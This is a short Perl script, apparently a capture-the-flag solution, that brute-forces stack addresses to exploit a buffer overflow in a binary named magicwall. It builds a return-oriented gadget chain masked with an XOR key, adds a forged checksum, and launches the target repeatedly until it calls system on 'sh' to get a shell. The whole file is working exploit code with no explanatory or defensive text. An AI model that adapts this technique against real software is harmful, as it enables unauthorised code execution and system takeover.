#!/usr/bin/perl
$| = 1;

# addr_of_ret is padded good
# so hope it's ok
$addr_of_ret = 0xbffff904;

for ($addr_of_system_addr = 0xbffffff0; $addr_of_system_addr >= 0xbffffd00; $addr_of_system_addr--) {
# "sh ;" is repeated, so only 4 different offsets
for ($addr_of_cmd = 0xbffffe04; $addr_of_cmd < 0xbffffe04+4; $addr_of_cmd++) {

    # pop ebx; pop ebp; ret
    $sh  = pack("V", 0x08048840 ^ 0xdefaced);           # ---
    $sh .= pack("V", $addr_of_system_addr ^ 0xdefaced); # ebx
    $sh .= pack("V", 0xdeadbeef ^ 0xdefaced);           # ebp

    # mov eax, [ebx]; call eax
    $sh .= pack("V", 0x08048838 ^ 0xdefaced);           # ---
    $sh .= pack("V", $addr_of_cmd ^ 0xdefaced);         # sh ;

    # returns padding
    $sh = pack("V", 0x08048842  ^ 0xdefaced).$sh while (length($sh) < 136);

    # addr of ret
    $sh .= pack("V", $addr_of_ret ^ 0xdefaced); # system

    # calculating sum
    @sh = split //, $sh;
    $sum = 0;
    @hash = (0xed, 0xac, 0xef, 0xd);
    for ($i = 0; $i < $#sh+1; $i++) {
        if (!($i&3)) {
            $ch = ord($sh[$i])^$hash[$i%4];
            $ch = -(256-$ch) if ($ch > 127);
            $sum += $ch;
        }
    }
    
    print sprintf("%08x %08x %08x (%d): ", $addr_of_ret, $addr_of_cmd, $addr_of_system_addr, $sum);
    $pid = fork;
    unless ($pid) {
        exec "/home/ctf/magicwall", $sh, $sum;
        die("ERROR: $!\n");
    }
    waitpid($pid, 0);
    print "\n";
    
}}
